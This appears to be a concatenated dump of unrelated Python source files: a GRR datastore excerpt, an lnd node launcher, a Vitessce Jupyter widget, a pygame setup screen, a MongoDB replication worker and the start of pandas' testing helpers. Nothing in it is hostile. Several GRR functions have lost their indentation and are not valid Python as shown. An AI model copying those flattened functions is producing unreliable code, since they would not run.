      # prefix; the record's URN suffix is hex-encoded in the stored value.
      i = int(attr[len(self.COLLECTION_INDEX_ATTRIBUTE_PREFIX):], 16)
      yield (i, ts, int(value, 16))
def CollectionReadStoredTypes(self, collection_id):
for attribute, _, _ in self.ResolveRow(collection_id):
if attribute.startswith(self.COLLECTION_VALUE_TYPE_PREFIX):
yield attribute[len(self.COLLECTION_VALUE_TYPE_PREFIX):]
  def CollectionReadItems(self, records):
    """Reads the stored values for the given collection records.

    Args:
      records: Iterable of record objects carrying queue_id, timestamp,
        suffix and subpath, which together identify stored items.

    Yields:
      Tuples (value, timestamp), one per record found.
    """
    for _, v in self.MultiResolvePrefix([
        DataStore.CollectionMakeURN(record.queue_id, record.timestamp,
                                    record.suffix, record.subpath)[0]
        for record in records
    ], DataStore.COLLECTION_ATTRIBUTE):
      # Each record URN holds a single value under COLLECTION_ATTRIBUTE;
      # only the first match is used.
      _, value, timestamp = v[0]
      yield (value, timestamp)
  def QueueQueryTasks(self, queue, limit=1):
    """Retrieves tasks from a queue without leasing them.

    This is good for a read only snapshot of the tasks.

    Args:
      queue: The task queue that this task belongs to, usually client.Queue()
            where client is the ClientURN object you want to schedule msgs on.
      limit: Number of values to fetch.

    Returns:
      A list of Task() objects.
    """
    prefix = DataStore.QUEUE_TASK_PREDICATE_PREFIX
    all_tasks = []

    for _, serialized, ts in self.ResolvePrefix(
        queue, prefix, timestamp=DataStore.ALL_TIMESTAMPS):
      task = rdf_flows.GrrMessage.FromSerializedString(serialized)
      # The stored timestamp doubles as the task's lease expiry.
      task.leased_until = ts
      all_tasks.append(task)

    # NOTE(review): all matching tasks are deserialized before the limit is
    # applied - fine for snapshots, but costly on very long queues.
    return all_tasks[:limit]
def LabelFetchAll(self, subject):
result = []
for attribute, _, _ in self.ResolvePrefix(subject,
self.LABEL_ATTRIBUTE_PREFIX):
result.append(attribute[len(self.LABEL_ATTRIBUTE_PREFIX):])
return sorted(result)
  def FileHashIndexQuery(self, subject, target_prefix, limit=100):
    """Search the index for matches starting with target_prefix.

    Args:
      subject: The index to use. Should be a urn that points to the sha256
        namespace.
      target_prefix: The prefix to match against the index.
      limit: Either a tuple of (start, limit) or a maximum number of results to
        return.

    Yields:
      URNs of files which have the same data as this file - as read from the
      index.
    """
    if isinstance(limit, (tuple, list)):
      start, length = limit  # pylint: disable=unpacking-non-sequence
    else:
      start = 0
      length = limit

    # Hash values are stored lowercased, so normalise the query prefix too.
    prefix = (DataStore.FILE_HASH_TEMPLATE % target_prefix).lower()
    # NOTE(review): when `limit` is a (start, length) tuple it is forwarded
    # verbatim to ResolvePrefix as its limit argument - confirm ResolvePrefix
    # accepts tuple limits; otherwise start + length should be passed here.
    results = self.ResolvePrefix(subject, prefix, limit=limit)

    # Window the results to [start, start + length).
    for i, (_, hit, _) in enumerate(results):
      if i < start:
        continue
      if i >= start + length:
        break
      yield rdfvalue.RDFURN(hit)
def FileHashIndexQueryMultiple(self, locations, timestamp=None):
results = self.MultiResolvePrefix(
locations, DataStore.FILE_HASH_PREFIX, timestamp=timestamp)
for hash_obj, matches in results:
file_urns = []
for _, serialized_file_run, _ in matches:
file_urn = rdfvalue.RDFURN.FromSerializedString(serialized_file_run)
file_urns.append(file_urn)
yield (hash_obj, file_urns)
def AFF4FetchChildren(self, subject, timestamp=None, limit=None):
results = self.ResolvePrefix(
subject,
DataStore.AFF4_INDEX_DIR_PREFIX,
timestamp=timestamp,
limit=limit)
for predicate, _, timestamp in results:
yield (predicate[len(DataStore.AFF4_INDEX_DIR_PREFIX):], timestamp)
def AFF4MultiFetchChildren(self, subjects, timestamp=None, limit=None):
results = self.MultiResolvePrefix(
subjects,
DataStore.AFF4_INDEX_DIR_PREFIX,
timestamp=timestamp,
limit=limit)
for subject, matches in results:
children = []
for predicate, _, timestamp in matches:
children.append((predicate[len(DataStore.AFF4_INDEX_DIR_PREFIX):],
timestamp))
yield (subject, children)
class DBSubjectLock(object):
  """Provide a simple subject lock using the database.

  This class should not be used directly. Its only safe to use via the
  DataStore.LockRetryWrapper() above which implements correct backoff and
  retry behavior.
  """

  def __init__(self, data_store, subject, lease_time=None):
    """Obtain the subject lock for lease_time seconds.

    This is never called directly but produced from the
    DataStore.LockedSubject() factory.

    Args:
      data_store: A data_store handler.
      subject: The name of a subject to lock.
      lease_time: The minimum length of time the lock will remain valid in
        seconds. Note this will be converted to usec for storage.

    Raises:
      ValueError: No lease time was provided.
    """
    self.subject = utils.SmartStr(subject)
    self.store = data_store
    # expires should be stored as usec
    self.expires = None
    self.locked = False
    if lease_time is None:
      raise ValueError("Trying to lock without a lease time.")
    self._Acquire(lease_time)
    self.lease_time = lease_time

  def __enter__(self):
    return self

  def __exit__(self, unused_type, unused_value, unused_traceback):
    self.Release()

  def _Acquire(self, lease_time):
    # Subclass hook: take the lock and set self.expires / self.locked.
    raise NotImplementedError

  def Release(self):
    # Subclass hook: release the lock if currently held.
    raise NotImplementedError

  def UpdateLease(self, duration):
    """Update the lock lease time by at least the number of seconds.

    Note that not all data stores implement timed locks. This method is
    only useful for data stores which expire a lock after some time.

    Args:
      duration: The number of seconds to extend the lock lease.
    """
    raise NotImplementedError

  def CheckLease(self):
    """Return the time remaining on the lock in seconds."""
    if not self.expires:
      return 0
    # self.expires is microseconds since the epoch (see __init__ comment).
    return max(0, self.expires / 1e6 - time.time())

  def __del__(self):
    # Best-effort release on garbage collection; errors are deliberately
    # swallowed because interpreter shutdown can make cleanup raise.
    try:
      self.Release()
    except Exception:  # This can raise on cleanup pylint: disable=broad-except
      pass

  def ExpirationAsRDFDatetime(self):
    # Convert the usec expiry into an RDFDatetime.
    return rdfvalue.RDFDatetime.FromSecondsSinceEpoch(self.expires / 1e6)
class DataStoreInit(registry.InitHook):
  """Initialize the data store.

  Depends on the stats module being initialized.
  """

  def _ListStorageOptions(self):
    # Prints one "name<tab><tab>docstring" line per registered implementation.
    for name, cls in iteritems(DataStore.classes):
      print("%s\t\t%s" % (name, cls.__doc__))

  def Run(self):
    """Initialize the data_store."""
    # The initialized handles are published through these module globals.
    global DB  # pylint: disable=global-statement
    global REL_DB  # pylint: disable=global-statement
    global BLOBS  # pylint: disable=global-statement

    # --list_storage just dumps the available backends and exits.
    if flags.FLAGS.list_storage:
      self._ListStorageOptions()
      sys.exit(0)

    try:
      cls = DataStore.GetPlugin(config.CONFIG["Datastore.implementation"])
    except KeyError:
      msg = ("No Storage System %s found." %
             config.CONFIG["Datastore.implementation"])
      if config.CONFIG["Datastore.implementation"] == "SqliteDataStore":
        msg = "The SQLite datastore is no longer supported."
      print(msg)
      print("Available options:")
      self._ListStorageOptions()
      raise ValueError(msg)

    DB = cls()  # pylint: disable=g-bad-name
    DB.Initialize()
    # Flush buffered writes on interpreter exit.
    atexit.register(DB.Flush)
    # A monitoring port of 0 disables the monitor thread.
    monitor_port = config.CONFIG["Monitoring.http_port"]
    if monitor_port != 0:
      DB.InitializeMonitorThread()

    # Initialize the blobstore.
    blobstore_name = config.CONFIG.Get("Blobstore.implementation")
    try:
      cls = blob_store.REGISTRY[blobstore_name]
    except KeyError:
      raise ValueError("No blob store %s found." % blobstore_name)
    BLOBS = blob_store.BlobStoreValidationWrapper(cls())

    # Initialize a relational DB if configured.
    rel_db_name = config.CONFIG["Database.implementation"]
    if not rel_db_name:
      return
    try:
      cls = registry_init.REGISTRY[rel_db_name]
    except KeyError:
      raise ValueError("Database %s not found." % rel_db_name)
    logging.info("Using database implementation %s", rel_db_name)
    REL_DB = db.DatabaseValidationWrapper(cls())
|
try_multidae.py | from multiprocessing import Process
from paths import LND_PATH, LNCLI_PATH
from os import system
# https://lyceum-allotments.github.io/2017/03/python-and-pipes-part-6-multiple-subprocesses-and-pipes/
def run_lnd(directory):
    """Launch an lnd testnet node (neutrino backend) with *directory* as lnddir.

    Blocks until the lnd process exits, so it is meant to be the target of a
    worker Process.
    """
    system(
        f"{LND_PATH} --bitcoin.active --bitcoin.testnet"
        " --debuglevel=info --bitcoin.node=neutrino"
        " --neutrino.connect=faucet.lightning.community"
        f" --lnddir={directory}"
    )


if __name__ == "__main__":
    # BUG FIX: the original called p.join() inside the spawn loop, which
    # blocked until the first lnd exited before starting the second - the two
    # daemons ran sequentially. Start all processes first, then join them so
    # alice and bob run concurrently. The __main__ guard also prevents
    # re-spawning on import under the multiprocessing "spawn" start method.
    procs = []
    for d in ["nodes/alice/.lnd", "nodes/bob/.lnd"]:
        p = Process(target=run_lnd, args=(d,))
        p.start()
        procs.append(p)
    for p in procs:
        p.join()
|
widget.py | from ._version import js_version_info
import importlib.util
from urllib.parse import quote_plus
import json
# Widget dependencies
import ipywidgets as widgets
from traitlets import Unicode, Dict, Int, Bool
import time
# Server dependencies
import asyncio
from hypercorn.config import Config
from hypercorn.asyncio import serve
from starlette.applications import Starlette
from starlette.middleware import Middleware
from starlette.middleware.cors import CORSMiddleware
from threading import Thread
import socket
# See js/lib/widget.js for the frontend counterpart to this file.
MAX_PORT_TRIES = 1000
DEFAULT_PORT = 8000
def run_server_loop(app, port):
    """Run a Hypercorn server for the ASGI *app* on localhost:port.

    Intended as the target of a background thread: a fresh event loop is
    created for that thread and this call blocks until the server stops.
    """
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)

    config = Config()
    config.bind = [f"localhost:{port}"]
    # As of Hypercorn 0.11.0, need to explicitly set signal handlers to a no-op
    # (otherwise it will try to set signal handlers assuming it is on the main thread which throws an error)
    # The shutdown_trigger returns a Future that never completes, so the
    # server runs for the lifetime of the thread.
    loop.run_until_complete(serve(app, config, shutdown_trigger=lambda: asyncio.Future()))
    loop.close()
def is_port_in_use(port):
    """Return True if something is accepting TCP connections on localhost:port."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with probe:
        # connect_ex returns 0 on a successful connection.
        return probe.connect_ex(("localhost", port)) == 0
def get_base_url_and_port(port, next_port, proxy=False, base_url=None):
    """Resolve the base URL and port used to serve widget data.

    Args:
        port: Explicit port to use, or None to probe for a free one starting
            from next_port.
        next_port: Next candidate port for automatic allocation.
        proxy: If True, build a jupyter-server-proxy relative URL instead of a
            localhost URL.
        base_url: If given, used verbatim instead of constructing one.

    Returns:
        Tuple (base_url, use_port, next_port) where next_port is the updated
        candidate for the following allocation.

    Raises:
        ValueError: proxy is requested but jupyter-server-proxy is missing.
    """
    if port is None:
        use_port = next_port
        next_port += 1
        # Probe forward until a free port is found, bounded by MAX_PORT_TRIES.
        port_tries = 1
        while is_port_in_use(use_port) and port_tries < MAX_PORT_TRIES:
            use_port = next_port
            next_port += 1
            port_tries += 1
    else:
        use_port = port
    if base_url is None:
        if proxy:
            if importlib.util.find_spec('jupyter_server_proxy') is None:
                raise ValueError("To use the widget through a proxy, jupyter-server-proxy must be installed.")
            base_url = f"proxy/{use_port}"
        else:
            base_url = f"http://localhost:{use_port}"
    return base_url, use_port, next_port
def serve_routes(routes, use_port):
    """Serve the given data routes on a background HTTP server.

    No server is started when there are no routes to serve.
    """
    if len(routes) > 0:
        # Allow cross-origin GETs (with Range headers) so the Vitessce
        # frontend can fetch data hosted on this separate port.
        middleware = [
            Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=["OPTIONS", "GET"], allow_headers=['Range'])
        ]
        app = Starlette(debug=True, routes=routes, middleware=middleware)
        t = Thread(target=run_server_loop, args=(app, use_port))
        t.start()
        # Give the server a moment to come up before callers hand out URLs.
        time.sleep(1)
def launch_vitessce_io(config, theme='light', port=None, base_url=None, open=True):
    """Serve the config's data locally and open it on vitessce.io.

    Args:
        config: A view config instance providing to_dict() and get_routes().
        theme: Frontend theme name passed in the URL.
        port: Explicit local port for the data server, or None to auto-pick.
        base_url: Base URL embedded in the config, or None to construct one.
        open: When True, open the resulting URL in the default web browser.

    Returns:
        The vitessce.io URL carrying the JSON config as a data URI.
    """
    import webbrowser
    base_url, use_port, _ = get_base_url_and_port(port, DEFAULT_PORT, base_url=base_url)
    config_dict = config.to_dict(base_url=base_url)
    routes = config.get_routes()
    serve_routes(routes, use_port)
    # The whole view config rides in the URL as a percent-encoded data URI.
    vitessce_url = f"http://vitessce.io/?theme={theme}&url=data:," + quote_plus(json.dumps(config_dict))
    if open:
        webbrowser.open(vitessce_url)
    return vitessce_url
@widgets.register
class VitessceWidget(widgets.DOMWidget):
    """
    A class to represent a Jupyter widget for Vitessce.
    """
    # Name of the widget view class in front-end
    _view_name = Unicode('VitessceView').tag(sync=True)
    # Name of the widget model class in front-end
    _model_name = Unicode('VitessceModel').tag(sync=True)
    # Name of the front-end module containing widget view
    _view_module = Unicode('vitessce-jupyter').tag(sync=True)
    # Name of the front-end module containing widget model
    _model_module = Unicode('vitessce-jupyter').tag(sync=True)
    # Version of the front-end module containing widget view
    _view_module_version = Unicode('^%s.%s.%s' % (js_version_info[0], js_version_info[1], js_version_info[2])).tag(sync=True)
    # Version of the front-end module containing widget model
    _model_module_version = Unicode('^%s.%s.%s' % (js_version_info[0], js_version_info[1], js_version_info[2])).tag(sync=True)

    # Widget specific property.
    # Widget properties are defined as traitlets. Any property tagged with `sync=True`
    # is automatically synced to the frontend *any* time it changes in Python.
    # It is synced back to Python from the frontend *any* time the model is touched.
    config = Dict({}).tag(sync=True)
    height = Int(600).tag(sync=True)
    theme = Unicode('auto').tag(sync=True)
    proxy = Bool(False).tag(sync=True)

    # Shared counter so successive widgets probe successive ports.
    next_port = DEFAULT_PORT

    def __init__(self, config, height=600, theme='auto', port=None, proxy=False):
        """
        Construct a new Vitessce widget.

        :param config: A view config instance.
        :type config: VitessceConfig
        :param str theme: The theme name, either "light" or "dark". By default, "auto", which selects light or dark based on operating system preferences.
        :param int height: The height of the widget, in pixels. By default, 600.
        :param int port: The port to use when serving data objects on localhost. By default, 8000.
        :param bool proxy: Is this widget being served through a proxy, for example with a cloud notebook (e.g. Binder)?

        .. code-block:: python
            :emphasize-lines: 4

            from vitessce import VitessceConfig, VitessceWidget

            vc = VitessceConfig.from_object(my_scanpy_object)
            vw = vc.widget()
            vw
        """
        base_url, use_port, VitessceWidget.next_port = get_base_url_and_port(port, VitessceWidget.next_port, proxy=proxy)
        config_dict = config.to_dict(base_url=base_url)
        routes = config.get_routes()
        super(VitessceWidget, self).__init__(config=config_dict, height=height, theme=theme, proxy=proxy)
        serve_routes(routes, use_port)

    def _get_coordination_value(self, coordination_type, coordination_scope):
        """Look up a value in the synced coordination space.

        When coordination_scope is None the scope is inferred, which only
        works if exactly one scope exists for the coordination type.
        """
        obj = self.config['coordinationSpace'][coordination_type]
        obj_scopes = list(obj.keys())
        # FIX: use identity comparison with None instead of `!= None`.
        if coordination_scope is not None:
            if coordination_scope in obj_scopes:
                return obj[coordination_scope]
            else:
                raise ValueError(f"The specified coordination scope '{coordination_scope}' could not be found for the coordination type '{coordination_type}'. Known coordination scopes are {obj_scopes}")
        else:
            if len(obj_scopes) == 1:
                auto_coordination_scope = obj_scopes[0]
                return obj[auto_coordination_scope]
            elif len(obj_scopes) > 1:
                raise ValueError(f"The coordination scope could not be automatically determined because multiple coordination scopes exist for the coordination type '{coordination_type}'. Please specify one of {obj_scopes} using the scope parameter.")
            else:
                raise ValueError(f"No coordination scopes were found for the coordination type '{coordination_type}'.")

    def get_cell_selection(self, scope=None):
        """Return the current cell selection from the coordination space."""
        return self._get_coordination_value('cellSelection', scope)
|
Setup.py | """
Author: George Macrae
2014
"""
import pygame, pygbutton, sys
from pygame.locals import *
from socket import *
import threading
import textbox
import Matchup
import startGame
from Tkinter import Tk
from tkFileDialog import askopenfilename
FPS = 30
# Window geometry in pixels.
WINDOWWIDTH = 800
WINDOWHEIGHT = 700
# Colour constants (RGB tuples; BLACK carries a fourth component that is
# passed through to fill() as-is).
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0, 0.8)
# NOTE(review): SysFont runs at import time; pygame's font module must already
# be initialised by the importer (pygame.init() is commented out in start()) -
# confirm the entry point initialises pygame before importing this module.
FONT = pygame.font.SysFont("Arial", 14)
def listener(clientsocket,SCREEN):
    """Background thread: handles setup-phase messages from the server.

    Mutates the module-level flags (set_up, op_ready, ready, listen, loadGame)
    that the start() loop polls, and redraws the screen when the opponent
    signals readiness. Exits on 'ExitSetup', 'BreakListener', or once both
    players are ready.
    """
    global set_up
    global op_ready
    global ready
    global listen
    global loadGame
    global lg
    while True :
        data = clientsocket.recv(1024)
        print 'SET UP : data recv '+ str(data)
        # Opponent backed out of the setup screen.
        if data == 'ExitSetup':
            print 'EXIT SETUP'
            set_up = False
            break
        # Opponent pressed start: repaint the screen with a notice.
        if data == 'OppReady':
            windowBgColor = BLACK
            SCREEN.fill(windowBgColor)
            label = FONT.render(" ", 1, (255,255,0))
            msg = FONT.render("Opponent is Ready", 1, (255,255,0))
            SCREEN.blit(msg,(150,150))
            SCREEN.blit(label, (100, 100))
            SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
            buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 250, 120, 30), 'back')
            buttonStart = pygbutton.PygButton((WINDOWWIDTH/2-60, 50, 120, 30), 'start')
            buttonExit.draw(SCREEN)
            buttonStart.draw(SCREEN)
            pygame.display.update()
            op_ready = True
        # Explicit request to stop listening.
        if data == 'BreakListener':
            # if op_ready == True and ready == True:
            listen = False
            print 'break listener!!'
            break
        # 'Load:<...>:<name>' messages carry the saved-game name to load.
        if data[:5]=='Load:':
            l = data.split(':')
            loadGame = l[-1]
            print loadGame
        # Both sides ready: stop listening so start() can launch the game.
        if op_ready == True and ready == True:
            listen = False
            print 'break listener,both ready'
            break
def start(clientsocket,opp,user,un):
    """Runs the pre-game setup screen for a matched pair of players.

    Draws the back/start/Load buttons, spawns listener() on a background
    thread, and polls the shared flags it sets until either side exits
    (back to Matchup) or both sides are ready (into startGame).

    Args:
        clientsocket: Connected socket to the game server.
        opp: Opponent's name.
        user: This player's name (sliced with [1:-1] when echoed back).
        un: Username forwarded to Matchup.start on exit.
    """
    print 'Set up'+str(threading.activeCount())
    print 'opp = '+ opp
    global o
    o = opp
    windowBgColor = BLACK
    # pygame.init()
    SCREEN = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
    pygame.display.set_caption('Set up')
    SCREEN.fill(windowBgColor)
    label = FONT.render(" ", 1, (255,255,0))
    SCREEN.blit(label, (100, 100))
    SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
    buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 250, 120, 30), 'back')
    buttonStart = pygbutton.PygButton((WINDOWWIDTH/2-60, 50, 120, 30), 'start')
    buttonLoad = pygbutton.PygButton((WINDOWWIDTH/2-60, 100, 120,30), 'Load')
    buttonLoad.draw(SCREEN)
    buttonExit.draw(SCREEN)
    buttonStart.draw(SCREEN)
    pygame.display.update()
    # Shared state polled here and mutated by the listener thread.
    global listen
    global set_up
    global op_ready
    global ready
    global loadGame
    loadGame = ''
    listen = True
    op_ready = False
    set_up = True
    ready = False
    player1 = True
    l_thread = threading.Thread(target = listener, args = (clientsocket,SCREEN))
    l_thread.start()
    load = None
    while True :
        # Opponent exited setup: fall back to the matchup screen.
        if set_up == False:
            Matchup.start(clientsocket,un)
            break
        # Both sides ready and the listener stopped: launch the game.
        if op_ready == True and ready == True and listen == False:
            clientsocket.send('StartGame')
            reef = clientsocket.recv(1024)
            reef = reef.split(':')
            print reef
            print reef[2]
            # Third field, when present, is a saved game to load.
            if reef[2] != '':
                loadGame = reef[2]
            startGame.main(clientsocket, opp,user,player1,reef[1],loadGame)
            break
        for event in pygame.event.get():
            if 'click' in buttonExit.handleEvent(event) and ready == False:
                print 'Back-Setup'
                clientsocket.send('ExitSetup:'+opp)
                clientsocket.send('ExitSetup:'+user[1:-1])
            if 'click' in buttonStart.handleEvent(event) and ready == False:
                ready = True
                windowBgColor = BLACK
                SCREEN.fill(windowBgColor)
                SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
                msg = FONT.render("Waiting for opponent...", 1, (0,0,0))
                SCREEN.blit(msg,(150,150))
                SCREEN.blit(label, (100, 100))
                pygame.display.update()
                clientsocket.send('Ready:'+str(opp))
                # If the opponent was already ready, this side joins second.
                if op_ready == True:
                    clientsocket.send('BreakListener')
                    player1 = False
            if 'click' in buttonLoad.handleEvent(event) and ready == False:
                print "load"
                filename = 'hello'
                Tk().withdraw()
                filename = askopenfilename()
                print filename == ''
                if filename == '':
                    filename = 'HELLO'
                # Only .bsh saved-game files may be loaded.
                if(filename[-4]+filename[-3]+filename[-2]+filename[-1] != '.bsh'):
                    print 'not a Name'
                    label = FONT.render("Wrong file extension - can only load .bsh", 1, (255,255,0))
                    SCREEN.blit(label, (100, 100))
                else:
                    load = filename
                    clientsocket.send("Load:"+'/'+str(opp)+'/'+filename)
|
datamunging.py | import logging
import time
import threading
class DataMunging:
    """Applies queued replication events (insert/update/delete) to MongoDB.

    run() drains the persistent replicator queue and applies each event to
    the target collection; check_queue() runs as a daemon thread watching the
    in-process replicator queue to track whether new entries have arrived.
    """

    mongo = None

    def __init__(self, mongo, replicator_queue):
        self.mongo = mongo
        self.logger = logging.getLogger(__name__)
        self.replicator_queue = replicator_queue
        self.lock = threading.Lock()
        # Sequence number of the most recently applied event.
        self.last_seqnum = 0
        self.run_parser = False

    def run(self, module_instance=None):
        """Main loop: fetch queued events, apply them, then purge them.

        Args:
            module_instance: Optional plug-in exposing run(record, mongo);
                may transform each record before it is applied. On plug-in
                failure the raw record is applied instead.
        """
        queue_thread = threading.Thread(target=self.check_queue)
        queue_thread.daemon = True
        queue_thread.start()
        while True:
            try:
                queue = self.mongo.get_from_queue(100)
            except Exception as e:
                self.logger.error('Cannot get entries from replicator queue. Error: ' + str(e))
                # BUG FIX: previously execution fell through with `queue`
                # unbound and crashed on queue.count(); pause and retry.
                time.sleep(1)
                continue
            if queue.count() < 1:
                self.logger.debug('No entries in replicator queue')
                time.sleep(1)
                continue
            # if not self.run_parser:
            #     self.logger.debug('No messages from replicator queue')
            #     continue
            to_delete = list()
            for record in queue:
                if module_instance is not None:
                    try:
                        doc = module_instance.run(record, self.mongo)
                    except Exception as e:
                        self.logger.error('Error during parse data with module. Error: ' + str(e))
                        doc = record
                key = None
                self.logger.debug('Event: ' + doc['event_type'])
                # Updates and deletes need the table's primary key to
                # identify the target document.
                if doc['event_type'] in ['update', 'delete']:
                    self.logger.debug('Event: ' + doc['event_type'])
                    try:
                        key = self.mongo.get_primary_key(doc['table'], doc['schema'])
                        self.logger.debug(key)
                    except Exception as e:
                        self.logger.error('Cannot get primary key for table ' + doc['table'] +
                                          ' in schema ' + doc['schema'] + '. Error: ' + str(e))
                if doc['event_type'] == 'insert':
                    try:
                        self.mongo.insert(doc['values'], doc['schema'], doc['table'])
                        # NOTE(review): the insert branch stringifies _id while
                        # update/delete append it raw - confirm which form
                        # delete_from_queue expects.
                        to_delete.append(str(doc['_id']))
                        self.last_seqnum = doc['seqnum']
                    except Exception as e:
                        self.logger.error('Cannot insert document into collection ' + doc['table'] +
                                          ' db ' + doc['schema'] + ' Error: ' + str(e))
                elif doc['event_type'] == 'update':
                    if key is None:
                        # No primary key known: match on the full pre-image.
                        primary_key = doc['values']['before']
                    else:
                        primary_key = dict()
                        for k in key['primary_key']:
                            primary_key[k] = str(doc['values']['after'][k])
                    try:
                        self.mongo.update(doc['values']['after'], doc['schema'], doc['table'], primary_key)
                        to_delete.append(doc['_id'])
                        self.last_seqnum = doc['seqnum']
                    except Exception as e:
                        self.logger.error('Cannot update document ' + str(doc['_id']) +
                                          ' into collection ' + doc['table'] +
                                          ' db ' + doc['schema'] + ' Error: ' + str(e))
                elif doc['event_type'] == 'delete':
                    if key is not None:
                        primary_key = dict()
                        for k in key['primary_key']:
                            primary_key[k] = str(doc['values'][k])
                    else:
                        primary_key = None
                    try:
                        self.mongo.delete(doc=doc['values'], schema=doc['schema'], collection=doc['table'],
                                          primary_key=primary_key)
                        to_delete.append(doc['_id'])
                        self.last_seqnum = doc['seqnum']
                    except Exception as e:
                        self.logger.error('Cannot delete document ' + str(doc['_id']) +
                                          ' into collection ' + doc['table'] +
                                          ' db ' + doc['schema'] + ' Error: ' + str(e))
            # Purge successfully applied events from the queue.
            self.logger.debug('Delete records: ' + str(to_delete))
            for queue_id in to_delete:
                try:
                    self.mongo.delete_from_queue({'_id': queue_id})
                except Exception as e:
                    self.logger.error('Cannot delete document from queue Error: ' + str(e))
            time.sleep(5)

    def check_queue(self):
        """Daemon loop: drains the in-process queue and updates run_parser."""
        self.logger.info('Start QueueMonitor')
        while True:
            if not self.replicator_queue.empty():
                try:
                    self.logger.debug('Try to read from replicator queue')
                    msg_queue = self.replicator_queue.get()
                    self.logger.debug('Read from replicator queue')
                    self.manage_replicator_msg(msg_queue)
                    self.logger.debug('Replicator message managed')
                except Exception as e:
                    self.logger.error('Cannot read and manage replicator message. Error: ' + str(e))
            time.sleep(.1)

    def manage_replicator_msg(self, msg):
        """Sets run_parser according to whether msg advertises new entries.

        Args:
            msg: Dict with a 'seqnum' key; compared against last_seqnum.
        """
        with self.lock:
            self.logger.debug('Message from queue')
            self.logger.debug(msg)
            self.logger.debug('Last seqnum: ' + str(self.last_seqnum))
            if msg['seqnum'] > self.last_seqnum:
                self.logger.debug('new entries in queue')
                self.run_parser = True
            else:
                self.logger.debug('NO new entries in queue')
                self.run_parser = False
|
testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
    """Revert the testing-mode warning filters to 'ignore'.

    Mirror image of set_testing_mode: same environment switch, opposite
    filter action.
    """
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" in mode:
        warnings.simplefilter("ignore", _testing_mode_warnings)


set_testing_mode()
def reset_display_options():
    """Restore every pandas ``display.*`` option to its default value."""
    # silent=True suppresses warnings raised for deprecated options.
    pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
    """
    Pickle an object and then read it again.

    Parameters
    ----------
    obj : pandas object
        The object to pickle and then re-read.
    path : str, default None
        The path where the pickled object is written and then read.

    Returns
    -------
    round_trip_pickled_object : pandas object
        The original object that was pickled and then re-read.
    """
    target = path
    if target is None:
        target = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
    with ensure_clean(target) as clean_path:
        pd.to_pickle(obj, clean_path)
        return pd.read_pickle(clean_path)
def round_trip_pathlib(writer, reader, path=None):
    """
    Write an object to a file specified by a pathlib.Path and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    round_trip_object : pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    Path = pytest.importorskip("pathlib").Path
    target = "___pathlib___" if path is None else path
    with ensure_clean(target) as clean_path:
        writer(Path(clean_path))
        return reader(Path(clean_path))
def round_trip_localpath(writer, reader, path=None):
    """
    Write an object to a file specified by a py.path LocalPath and read it back.

    Parameters
    ----------
    writer : callable bound to pandas object
        IO writing function (e.g. DataFrame.to_csv )
    reader : callable
        IO reading function (e.g. pd.read_csv )
    path : str, default None
        The path where the object is written and then read.

    Returns
    -------
    round_trip_object : pandas object
        The original object that was serialized and then re-read.
    """
    import pytest

    LocalPath = pytest.importorskip("py.path").local
    target = "___localpath___" if path is None else path
    with ensure_clean(target) as clean_path:
        writer(LocalPath(clean_path))
        return reader(LocalPath(clean_path))
@contextmanager
def decompress_file(path, compression):
    """
    Open a compressed file and return a file object.

    Parameters
    ----------
    path : str
        The path where the file is read from.
    compression : {'gzip', 'bz2', 'zip', 'xz', None}
        Name of the decompression to use.

    Returns
    -------
    f : file object
    """
    zip_file = None
    if compression is None:
        f = open(path, "rb")
    elif compression == "gzip":
        f = gzip.open(path, "rb")
    elif compression == "bz2":
        f = bz2.BZ2File(path, "rb")
    elif compression == "xz":
        f = _get_lzma_file(lzma)(path, "rb")
    elif compression == "zip":
        zip_file = zipfile.ZipFile(path)
        zip_names = zip_file.namelist()
        # Only single-member archives are supported.
        if len(zip_names) != 1:
            raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
        f = zip_file.open(zip_names.pop())
    else:
        raise ValueError("Unrecognized compression type: {}".format(compression))

    try:
        yield f
